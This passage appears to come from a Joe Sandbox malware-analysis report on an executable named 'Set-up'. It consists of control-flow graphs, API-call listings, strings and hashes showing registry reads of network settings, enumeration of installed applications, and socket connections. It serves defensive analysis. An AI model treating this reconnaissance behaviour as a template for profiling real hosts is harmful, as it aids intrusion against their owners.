                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 005CAD0A
                                      • RegEnumKeyExA.KERNELBASE ref: 005CAD8D
                                      • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 005CADB0
                                      • RegCloseKey.KERNELBASE(?), ref: 005CADD9
                                      • RegEnumKeyExA.KERNELBASE ref: 005CAE08
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 005CAE2A
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CAE54
                                      • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 005CAEA3
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 005CAF18
                                      • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 005CAF2C
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005CAF63
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005CAFB2
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 005CB027
                                      • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 005CB03B
                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 005CB072
                                      • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 005CB0C1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
                                      • API String ID: 1856363200-4239849775
                                      • Opcode ID: f06cb7b4935ac3bb8ffb46a20f4a6c9544f56a98545a5c7d13e687af6f275ebb
                                      • Instruction ID: 4d146b3f77e56f2ba9ead9b3fc550d6be37338d52de99dfe78827998a6efebda
                                      • Opcode Fuzzy Hash: f06cb7b4935ac3bb8ffb46a20f4a6c9544f56a98545a5c7d13e687af6f275ebb
                                      • Instruction Fuzzy Hash: 558289B1604305AFE7209B64CC86F6B7BE8FF85704F14482CF986972A1E770E944CB92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 582 5d9740-5d975b 583 5d975d-5d9768 call 5d78a0 582->583 584 5d9780-5d9782 582->584 592 5d976e-5d9770 583->592 593 5d99bb-5d99c0 583->593 586 5d9788-5d97a0 getenv call 5d78a0 584->586 587 5d9914-5d994e memset RegOpenKeyExA 584->587 586->593 597 5d97a6-5d97c5 _stat64 586->597 589 5d995a-5d99ab RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen call 5d78a0 587->589 590 5d9950-5d9955 587->590 599 5d99b0-5d99b5 589->599 595 5d9a0c-5d9a15 590->595 592->597 598 5d9772-5d977e 592->598 593->595 600 5d9827-5d9833 597->600 601 5d97c7-5d97e0 597->601 598->586 599->593 599->597 604 5d985f-5d9872 call 5d5ca0 600->604 605 5d9835-5d985c call 5ce2b0 * 2 600->605 602 5d97f6-5d9809 _stricmp 601->602 603 5d97e2-5d97f3 _time64 601->603 602->600 608 5d980b-5d9810 602->608 603->602 612 5d9878-5d987d call 5d77b0 604->612 613 5d99f0 604->613 605->604 608->600 609 5d9812-5d9822 608->609 609->595 619 5d9882-5d9889 612->619 617 5d99f5-5d99fb call 5d5d00 613->617 626 5d99fe-5d9a09 617->626 619->617 622 5d988f-5d989b call 5c4fe0 619->622 622->613 629 5d98a1-5d98c3 _time64 call 5d78a0 622->629 626->595 633 5d98c9-5d98db call 5ce2d0 629->633 634 5d99c2-5d99ed call 5ce2b0 * 2 629->634 633->634 638 5d98e1-5d98f0 call 5ce2d0 633->638 634->613 638->634 644 5d98f6-5d9905 call 5d63f0 638->644 649 5d990b-5d990f 644->649 650 5d9f66-5d9f7f call 5d5d00 644->650 651 5d9a3f-5d9a5a call 5d6740 call 5d63f0 649->651 650->626 651->650 658 5d9a60-5d9a6e call 5d6d60 651->658 661 5d9a1f-5d9a39 call 5d6840 call 5d63f0 658->661 662 5d9a70-5d9a94 call 5d6200 call 5d67e0 call 5d6320 658->662 661->650 661->651 673 5d9a16-5d9a19 662->673 674 5d9a96-5d9ac6 call 5cd120 662->674 673->661 676 5d9fc1 673->676 679 5d9ac8-5d9adb call 5cd120 674->679 680 5d9ae1-5d9af7 call 5cd190 674->680 678 5d9fc5-5d9ffd call 5d5d00 call 5ce2b0 * 2 676->678 678->626 679->661 679->680 680->661 687 5d9afd-5d9b09 call 5c4fe0 680->687 687->676 694 5d9b0f-5d9b29 call 5ce730 687->694 698 5d9b2f-5d9b3a call 5d78a0 694->698 699 5d9f84-5d9f88 694->699 698->699 707 5d9b40-5d9b54 call 5ce760 698->707 702 5d9f95-5d9f99 699->702 703 5d9f9b-5d9f9e 702->703 704 5d9fa0-5d9fb6 call 5cebf0 * 2 702->704 703->676 703->704 715 5d9fb7-5d9fbe 704->715 712 5d9f8a-5d9f92 707->712 713 5d9b5a-5d9b6e call 5ce730 707->713 712->702 720 5d9b8c-5d9b97 call 5d63f0 713->720 721 5d9b70-5da004 713->721 715->676 726 5d9b9d-5d9bbf call 5d6740 call 5d63f0 720->726 727 5d9c9a-5d9cab call 5cea00 720->727 725 5da015-5da01d 721->725 728 5da01f-5da022 725->728 729 5da024-5da045 call 5cebf0 * 2 725->729 726->727 746 5d9bc5-5d9bda call 5d6d60 726->746 738 5d9f31-5d9f35 727->738 739 5d9cb1-5d9ccd call 5cea00 call 5ce960 727->739 728->678 728->729 729->678 741 5d9f37-5d9f3a 738->741 742 5d9f40-5d9f61 call 5cebf0 * 2 738->742 757 5d9cfd-5d9d0e call 5ce960 739->757 758 5d9ccf 739->758 741->661 741->742 742->661 746->727 756 5d9be0-5d9bf4 call 5d6200 call 5d67e0 746->756 756->727 777 5d9bfa-5d9c0b call 5d6320 756->777 767 5d9d10 757->767 768 5d9d53-5d9d55 757->768 761 5d9cd1-5d9cec call 5ce9f0 call 5ce4a0 758->761 778 5d9cee-5d9cfb call 5ce9d0 761->778 779 5d9d47-5d9d51 761->779 772 5d9d12-5d9d2d call 5ce9f0 call 5ce4a0 767->772 771 5d9e69-5d9e8e call 5cea40 call 5ce440 768->771 795 5d9e94-5d9eaa call 5ce3c0 771->795 796 5d9e90-5d9e92 771->796 799 5d9d2f-5d9d3c call 5ce9d0 772->799 800 5d9d5a-5d9d6f call 5ce960 772->800 788 5d9b75-5d9b86 call 5cea00 777->788 789 5d9c11-5d9c1c call 5d7b70 777->789 778->757 778->761 785 5d9dca-5d9ddb call 5ce960 779->785 805 5d9ddd-5d9ddf 785->805 806 5d9e2e-5d9e36 785->806 788->720 817 5d9f2d 788->817 789->720 810 5d9c22-5d9c33 call 5ce960 789->810 825 5da04a-5da04c 795->825 826 5d9eb0-5d9eb1 795->826 807 5d9eb3-5d9ec4 call 5ce9c0 796->807 799->772 820 5d9d3e-5d9d42 799->820 822 5d9d71-5d9d73 800->822 823 5d9dc2 800->823 815 5d9e06-5d9e21 call 5ce9f0 call 5ce4a0 805->815 812 5d9e3d-5d9e5b call 5cebf0 * 2 806->812 813 5d9e38-5d9e3b 806->813 807->661 828 5d9eca-5d9ed0 807->828 839 5d9c35 810->839 840 5d9c66-5d9c75 call 5d78a0 810->840 827 5d9e5e-5d9e67 812->827 813->812 813->827 852 5d9de1-5d9dee call 5cec80 815->852 853 5d9e23-5d9e2c call 5ceac0 815->853 817->738 820->771 833 5d9d9a-5d9db5 call 5ce9f0 call 5ce4a0 822->833 823->785 829 5da04e-5da051 825->829 830 5da057-5da070 call 5cebf0 * 2 825->830 826->807 827->771 827->807 836 5d9ee5-5d9ef2 call 5ce9f0 828->836 829->676 829->830 830->715 866 5d9d75-5d9d82 call 5cec80 833->866 867 5d9db7-5d9dc0 call 5ceac0 833->867 836->661 860 5d9ef8-5d9f0e call 5ce440 836->860 847 5d9c37-5d9c51 call 5ce9f0 _stricmp 839->847 856 5d9c7b-5d9c8f call 5ce7c0 840->856 857 5da011 840->857 847->720 870 5d9c57-5d9c64 call 5ce9d0 847->870 876 5d9df1-5d9e04 call 5ce960 852->876 853->876 856->720 879 5d9c95-5da00e 856->879 857->725 882 5d9f10-5d9f26 call 5ce3c0 860->882 883 5d9ed2-5d9edf call 5ce9e0 860->883 888 5d9d85-5d9d98 call 5ce960 866->888 867->888 870->840 870->847 876->806 876->815 879->857 882->883 895 5d9f28 882->895 883->661 883->836 888->823 888->833 895->676
                                      APIs
                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 005D978D
                                      • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 005D97BA
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005D97E4
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005D98A5
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 005D9920
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005D9946
                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 005D9974
                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 005D9981
                                      • RegCloseKey.ADVAPI32(?), ref: 005D998B
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005D9992
                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 005D97FE
                                        • Part of subcall function 005D78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,005DE16D,?), ref: 005D78AF
                                        • Part of subcall function 005D78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 005D78D9
                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 005D9C46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                      • API String ID: 3843116398-615551945
                                      • Opcode ID: 925e325aa25b3d15aed9b427491776ced4aecb77747155b19627614ae34df06d
                                      • Instruction ID: 69bae5806a154d8b8f528444a3c79c7ad6fee739179b0ef7a402bdf71f1f2db0
                                      • Opcode Fuzzy Hash: 925e325aa25b3d15aed9b427491776ced4aecb77747155b19627614ae34df06d
                                      • Instruction Fuzzy Hash: 8D3296B59042025FEB21AB68AC46B1B7FE4BF95314F08483AF84996362F731ED15C793

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: EnumOpen
                                      • String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
                                      • API String ID: 3231578192-3120786300
                                      • Opcode ID: ac6740096f0c37fcc677f6aa1fb36a18850f580a4d21d1f89b63da6ea2b19313
                                      • Instruction ID: 13b0e99c35bee68f6c7d491e9d1980e2cfad400d7aad6ac4ea8982ddfeac21ae
                                      • Opcode Fuzzy Hash: ac6740096f0c37fcc677f6aa1fb36a18850f580a4d21d1f89b63da6ea2b19313
                                      • Instruction Fuzzy Hash: BC71B6B49043199FDB00EF69C5847AEBBF0BF84318F10885DE99897341E7749A88CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1075 6ee5d0-6ee602 strlen MultiByteToWideChar 1076 6ee608 1075->1076 1077 6ee6b0-6ee6bb GetLastError 1075->1077 1080 6ee60f-6ee643 call 899f40 MultiByteToWideChar 1076->1080 1078 6ee6bd-6ee6d4 MultiByteToWideChar 1077->1078 1079 6ee6e2-6ee6f2 GetLastError 1077->1079 1078->1079 1081 6ee6d6-6ee6dd 1078->1081 1082 6ee6f4-6ee6ff fopen 1079->1082 1083 6ee703-6ee70a 1079->1083 1080->1083 1086 6ee649-6ee66d strlen MultiByteToWideChar 1080->1086 1081->1080 1082->1083 1087 6ee673-6ee683 _wfopen 1086->1087 1088 6ee701 1086->1088 1087->1083 1089 6ee685-6ee68e _errno 1087->1089 1088->1083 1090 6ee6a0-6ee6ae fopen 1089->1090 1091 6ee690-6ee69e _errno 1089->1091 1090->1083 1091->1083 1091->1090
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE5E2
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 006EE5FA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 006EE637
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0067A31E), ref: 006EE64D
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0067A31E,00000001,?,00000008,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000), ref: 006EE665
                                      • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE678
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE685
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE690
                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0067A31E,?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E), ref: 006EE6A6
                                      • GetLastError.KERNEL32(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE6B0
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 006EE6CC
                                      • GetLastError.KERNEL32(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE6E2
                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0067A31E,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE6FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                                      • String ID:
                                      • API String ID: 2867842857-0
                                      • Opcode ID: 8d70fdc4dc156fd204aa263c85dd1993a89af69243e03ef498f231245ae14020
                                      • Instruction ID: 40d3fa2aea0564e223ab2343972336c4315511ceecca6309856bf3778ca9285c
                                      • Opcode Fuzzy Hash: 8d70fdc4dc156fd204aa263c85dd1993a89af69243e03ef498f231245ae14020
                                      • Instruction Fuzzy Hash: 9C31A375601341BFEB206B76DC49F6A376AFB55711F148528F916C92D0EA329900CB62

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1092 548b50-548b69 1093 548be6 1092->1093 1094 548b6b-548b74 1092->1094 1095 548be9 1093->1095 1096 548b76-548b8d 1094->1096 1097 548beb-548bf2 1094->1097 1095->1097 1098 548bf3-548bfe call 54a550 1096->1098 1099 548b8f-548ba7 call 526e40 1096->1099 1106 548de4-548def 1098->1106 1107 548c04-548c08 1098->1107 1104 548bad-548baf 1099->1104 1105 548cd9-548d16 SleepEx getsockopt 1099->1105 1108 548bb5-548bb9 1104->1108 1109 548ca6-548cb0 1104->1109 1110 548d22 1105->1110 1111 548d18-548d20 WSAGetLastError 1105->1111 1112 548df5-548e19 call 54a150 WSASetLastError 1106->1112 1113 548e8c-548e95 1106->1113 1114 548dbd-548dc3 1107->1114 1115 548c0e-548c1d 1107->1115 1108->1097 1118 548bbb-548bc2 1108->1118 1109->1105 1123 548cb2-548cb8 1109->1123 1119 548d26-548d39 1110->1119 1111->1119 1140 548e88 1112->1140 1141 548e1b-548e26 1112->1141 1120 548e97-548e9c 1113->1120 1121 548f00-548f06 1113->1121 1114->1095 1116 548c35-548c48 WSAGetLastError call 54a150 1115->1116 1117 548c1f-548c2f connect 1115->1117 1134 548c4d-548c4f 1116->1134 1117->1116 1118->1097 1127 548bc4-548bcc 1118->1127 1128 548d43-548d61 call 52d8c0 call 54a150 1119->1128 1129 548d3b-548d3d 1119->1129 1130 548e9e-548eb6 call 522a00 1120->1130 1131 548edf-548eef call 5178b0 1120->1131 1121->1097 1124 548ddc-548dde 1123->1124 1125 548cbe-548cd4 call 54b180 1123->1125 1124->1095 1124->1106 1125->1106 1136 548bd4-548bda 1127->1136 1137 548bce-548bd2 1127->1137 1164 548d66-548d74 1128->1164 1129->1124 1129->1128 1130->1131 1156 548eb8-548edd call 523410 * 2 1130->1156 1153 548ef2-548efc 1131->1153 1143 548c51-548c58 1134->1143 1144 548c8e-548c93 1134->1144 1136->1097 1146 548bdc-548be1 1136->1146 1137->1097 1137->1136 1140->1113 1149 548e2e-548e85 call 52d090 call 554fd0 1141->1149 1150 548e28-548e2c 1141->1150 1143->1144 1152 548c5a-548c62 1143->1152 1157 548dc8-548dd9 call 54b100 1144->1157 1158 548c99-548c9f 1144->1158 1154 548dac-548db8 call 5550a0 1146->1154 1149->1140 1150->1140 1150->1149 1161 548c64-548c68 1152->1161 1162 548c6a-548c70 1152->1162 1153->1121 1154->1097 1156->1153 1157->1124 1158->1109 1161->1144 1161->1162 1162->1144 1168 548c72-548c8b call 5550a0 1162->1168 1164->1097 1170 548d7a-548d81 1164->1170 1168->1144 1170->1097 1174 548d87-548d8f 1170->1174 1176 548d91-548d95 1174->1176 1177 548d9b-548da1 1174->1177 1176->1097 1176->1177 1177->1097 1180 548da7 1177->1180 1180->1154
                                      APIs
                                      • connect.WS2_32(?,?,00000001), ref: 00548C2F
                                      • WSAGetLastError.WS2_32 ref: 00548C39
                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00548CF3
                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00548D0E
                                      • WSAGetLastError.WS2_32 ref: 00548D18
                                      • WSASetLastError.WS2_32(00000000), ref: 00548E0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLast$Sleepconnectgetsockopt
                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                      • API String ID: 2513251565-879669977
                                      • Opcode ID: e60fa973f57828f37d1972baa41cda535c62767195a6d61a596516ddb7691166
                                      • Instruction ID: 7ef9787b0cbd3bede40fe1cad566601e4b393a012a3cf052794b30986cd984bc
                                      • Opcode Fuzzy Hash: e60fa973f57828f37d1972baa41cda535c62767195a6d61a596516ddb7691166
                                      • Instruction Fuzzy Hash: 7EB1A074604706AFDB10DF24C889BBABFE4BF45318F048929E8598B2D2DB71EC55C761

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1321 5176a0-5176be 1322 5176c0-5176c7 1321->1322 1323 5176e6-5176f2 send 1321->1323 1322->1323 1324 5176c9-5176d1 1322->1324 1325 5176f4-517709 call 5172a0 1323->1325 1326 51775e-517762 1323->1326 1327 5176d3-5176e4 send 1324->1327 1328 51770b-517759 call 5172a0 __acrt_iob_func call 51cb20 fflush _errno 1324->1328 1325->1326 1327->1325 1328->1326
                                      APIs
                                      • send.WS2_32(multi.c,?,?,?), ref: 005176DE
                                      • send.WS2_32(multi.c,?,?,?), ref: 005176EA
                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00517721
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00517745
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051774D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
